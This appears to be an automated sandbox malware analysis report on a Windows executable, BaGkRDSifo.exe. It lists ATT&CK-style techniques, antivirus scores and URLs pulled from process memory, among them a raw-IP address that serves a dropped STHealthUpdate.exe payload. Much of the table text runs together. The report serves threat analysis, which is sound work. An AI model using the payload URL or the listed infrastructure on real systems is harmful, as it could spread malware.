            DLL Side-Loading
            1
            Masquerading
            1
            Input Capture
            1
            System Time Discovery
            Remote Services1
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory31
            Security Software Discovery
            Remote Desktop Protocol11
            Archive Collected Data
            11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive11
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Deobfuscate/Decode Files or Information
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            Application Window Discovery
            SSHKeylogging11
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing
            Cached Domain Credentials23
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            BaGkRDSifo.exe28%VirustotalBrowse
            BaGkRDSifo.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\Desktop\STHealthUpdate.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.adicon.com.cn/GetAllSampleListT0%Avira URL Cloudsafe
            http://tempuri.org/QueryReport_PKIT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchByteSampleToStringT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchByteSampleT0%Avira URL Cloudsafe
            http://11.65.9.11:9082/jkda/webservice/DPService#0%Avira URL Cloudsafe
            http://www.adicon.com.cn/ExistsByYYtmT0%Avira URL Cloudsafe
            http://tempuri.org/rm_RegionTransT0%Avira URL Cloudsafe
            http://tempuri.org/DownloadBarCodeFlagT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchByteSampleToStringT0%VirustotalBrowse
            http://tempuri.org/rm_RegionTransT1%VirustotalBrowse
            http://11.65.9.11:9082/jkda/webservice/DPService#0%VirustotalBrowse
            http://www.adicon.com.cn/ExistsByYYtmT0%VirustotalBrowse
            http://tempuri.org/QueryReport_PKIT1%VirustotalBrowse
            http://www.adicon.com.cn/GetAllSampleListT1%VirustotalBrowse
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/AppItemDownT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeT0%VirustotalBrowse
            http://tempuri.org/UpLoadReportFromBytesNewT0%Avira URL Cloudsafe
            http://tempuri.org/DownloadBarCodeFlagT1%VirustotalBrowse
            http://www.adicon.com.cn/GetTsscInfoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT0%Avira URL Cloudsafe
            http://tempuri.org/DownloadReportT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeT0%VirustotalBrowse
            http://www.adicon.com.cn/ExistsReportByYYtmT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/AppItemDownT0%VirustotalBrowse
            http://www.adicon.com.cn/UpdateMeiNianZuTaoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchByteSampleT0%VirustotalBrowse
            http://www.adicon.com.cn/GetTsscInfoT0%VirustotalBrowse
            http://tempuri.org/UpLoadReportFromBytesNewT1%VirustotalBrowse
            http://www.adicon.com.cn/GetReportListT0%Avira URL Cloudsafe
            http://tempuri.org/DownloadReportT1%VirustotalBrowse
            http://www.adicon.com.cn/GetSearchByteSampleByOtherT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetBLTCTPicByYYTMT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/ExistsReportByYYtmT0%VirustotalBrowse
            http://www.adicon.com.cn/AppUpdateInfoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeT1%VirustotalBrowse
            http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/UpdateMeiNianZuTaoT0%VirustotalBrowse
            http://www.adicon.com.cn/GetReportListT1%VirustotalBrowse
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/AppBarcodeStateT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchByteSampleByOtherT1%VirustotalBrowse
            http://tempuri.org/addInspectReqT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeT0%VirustotalBrowse
            http://www.adicon.com.cn/AppUpdateInfoT0%VirustotalBrowse
            http://www.adicon.com.cn/ValiUserT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianT0%VirustotalBrowse
            http://www.adicon.com.cn/AppBarcodeStateT0%VirustotalBrowse
            http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeT0%VirustotalBrowse
            http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT0%VirustotalBrowse
            http://www.adicon.com.cn/GetBLTCTPicByYYTMT0%VirustotalBrowse
            http://tempuri.org/addInspectReqT1%VirustotalBrowse
            http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT1%VirustotalBrowse
            http://tempuri.org/DownloadReportFormIDListByClientBarcodeNoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT0%Avira URL Cloudsafe
            http://com.wondersgroup.jkda.application.modules.webservice0%Avira URL Cloudsafe
            http://tempuri.org/DownloadReportFormIDListByBarcodeNoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/UpLoadXmlT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/ReportDetailForHzqbT0%Avira URL Cloudsafe
            http://tempuri.org/UpgradeRequestFormT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetXmmcListT0%Avira URL Cloudsafe
            http://tempuri.org/GetReportUriT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetTsscPicByAdiconBarcodeT0%VirustotalBrowse
            http://tempuri.org/UpgradeRequestFormT1%VirustotalBrowse
            http://www.adicon.com.cn/ReportDetailForHzqbT0%VirustotalBrowse
            http://tempuri.org/DownloadReportFormIDListByBarcodeNoT1%VirustotalBrowse
            http://www.adicon.com.cn/ValiUserT0%VirustotalBrowse
            http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/UpLoadXmlT0%VirustotalBrowse
            http://47.104.173.216:0%Avira URL Cloudsafe
            http://47.104.173.216:98760%Avira URL Cloudsafe
            http://tempuri.org/HelloWorldT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchStringSampleByCustomerCodeToByteT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetXmmcListT0%VirustotalBrowse
            http://www.adicon.com.cn/T0%Avira URL Cloudsafe
            http://tempuri.org/GetReportUriT1%VirustotalBrowse
            http://www.adicon.com.cn/GetSampleCountT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportItemListByAdiconBarocde_MeiNianT0%VirustotalBrowse
            http://www.adicon.com.cn/LoginT0%Avira URL Cloudsafe
            http://11.65.9.11:9082/jkda/webservice/DPService0%Avira URL Cloudsafe
            http://tempuri.org/getPatResultNoXmlT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetByteReportT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportListV1T0%Avira URL Cloudsafe
            http://com.wondersgroup.jkda.application.modules.webserviceTU0%Avira URL Cloudsafe
            http://www.adicon.com.cn/ExistsReportOtherT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetInputXmmcListT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportBaseInfoT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetSearchSampleT0%Avira URL Cloudsafe
            http://tempuri.org/CheckUpLoadReportFromBytesT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetBLTCTPicByKeyIdT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/UpLoadOrDownLoadByXmlT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/DetailListT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportUserItemByYYTMT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetReportUserItemT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/AppUpLoadXmlT0%Avira URL Cloudsafe
            http://www.adicon.com.cn/GetAllSampleList_MeiNianT0%Avira URL Cloudsafe
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://47.104.173.216:9876/server.txtfalse
            • Avira URL Cloud: safe
            unknown
            http://47.104.173.216:9876/STHealthUpdate.exefalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.adicon.com.cn/GetJSONReportItemListByCustomerBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/QueryReport_PKITBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchByteSampleTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetAllSampleListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchByteSampleToStringTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://11.65.9.11:9082/jkda/webservice/DPService#BaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ExistsByYYtmTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/rm_RegionTransTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadBarCodeFlagTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppItemDownTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/UpLoadReportFromBytesNewTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetTsscInfoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetJSONReportItemListByOtherCodeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/DownloadReportTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ExistsReportByYYtmTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/UpdateMeiNianZuTaoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportListTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchByteSampleByOtherTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetBLTCTPicByYYTMTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppUpdateInfoTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetTsscInfoByAdiconBarcodeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetReportItemListByCustomerBarocde_MeiNianTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/AppBarcodeStateTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tempuri.org/addInspectReqTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/SetSampleDownFlagByAdiconBarocdeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/ValiUserTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.adicon.com.cn/GetSearchStringSampleByAdiconCodeTBaGkRDSifo.exe, 00000000.00000002.2482246746.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490561215.0000000005B80000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000003.1222567574.0000000005734000.00000004.00000020.00020000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2490845606.0000000006580000.00000004.08000000.00040000.00000000.sdmp, BaGkRDSifo.exe, 00000000.00000002.2489016740.00000000045A4000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
